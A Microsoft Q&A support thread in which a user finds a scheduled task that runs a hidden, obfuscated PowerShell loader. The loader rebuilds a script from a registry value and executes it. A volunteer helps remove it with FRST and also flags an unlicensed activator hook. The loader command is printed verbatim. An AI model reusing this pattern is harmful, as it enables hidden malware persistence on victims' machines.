This browser is no longer supported.
Upgrade to Microsoft Edge to take advantage of the latest features, security updates, and technical support.
![](data:image/svg+xml, %3Csvg xmlns='http://www.w3.org/2000/svg' height='64' class='font-weight-bold' style='font: 600 30.11764705882353px "SegoeUI", Arial' width='64'%3E%3Ccircle fill='hsl(128, 8%, 22%)' cx='32' cy='32' r='32' /%3E%3Ctext x='50%25' y='55%25' dominant-baseline='middle' text-anchor='middle' fill='%23FFF' %3EA%3C/text%3E%3C/svg%3E)
i have noticed command prompt to appear and disappear instantly after 1-2 hours of startup then i checked my task scheduler and found this weird task named "t2PI3Rtb" which is tasked to run this script every 59 mins after user login
location = \Microsoft\Windows\Management\Provisioning\t2Pi3
script = /c EcHo iex "ICM ([ScrIptblOck]::creaTE([sTRIng]::JOiN('', ((Get-itemPrOpeRty -pAth 'hklm:\sOftWaRE\dEFauLTuserenVIRoNmEntt2pI3r').'t2PI3RtB' | % { cHAr }))))" | PowErsHELl -WInDOwstyLE hIDDeN
anyone knows if it is harmful or not?
Locked Question. This question was migrated from the Microsoft Support Community. You can vote on whether it's helpful, but you can't add comments or replies or follow the question.
Answer accepted by question author
Thanks for that. Turns out that the encoded script is the same one that's been circulating for many months now. All the domains it tries to contact have been taken down, so all it did was consume CPU whilst it endlessly looped.
If there's no further concerns, to completely remove FRST, just rename it to uninstall.exe and run it.
Also, it would be greatly appreciated if you would mark the thread as answered, by pressing Yes below the post that provided the solution.
Good luck!
I don't know about license for office as I never installed that myself, I was gifted this laptop and I upgraded its Hard Drive from HDD to SSD and at that time Windows and everything else was reinstalled. does that Infection/Fix have to do anything with these licenses?
Download the following Fixlist to the same folder that FRST is in.
Run FRST and press Fix.
After the computer restarts, there will be a Fixlog in the FRST folder and a log.txt on your Desktop.
Please share both files so I can decode the malware script and see if anything else needs to be done.
https://1drv.ms/t/s!AqQnVFhmcB_wmlz4BBBtoNiVRfWW?e=LMWUTc
Do you have genuine licenses for Windows and Office?
At present there's an activator running:
IFEO\osppsvc.exe: [VerifierDlls] SppExtComObjHook.dll
IFEO\SppExtComObj.exe: [VerifierDlls] SppExtComObjHook.dll
Hi AW! Thanks for quick reply and helping me on this. here is the link to the file. https://www.dropbox.com/s/034gjxdrdd9mkwy/FRST.zip?dl=0
Hi Jatinder, please provide logs from Farbar Recovery Scan Tool (FRST) and I'll help you remove the infection.
https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/
Run FRST and press Scan. Two logs are created in the folder that FRST is run from, FRST.txt and Addition.txt.
Zip the logs and share on OneDrive, Google Drive or any file sharing service, then post the share link.
* Note:If you are downloading FRST with Edge, smartscreen will initially block it.
Click on the 3 dots next to the warning and select Keep -> Show more -> Keep anyway.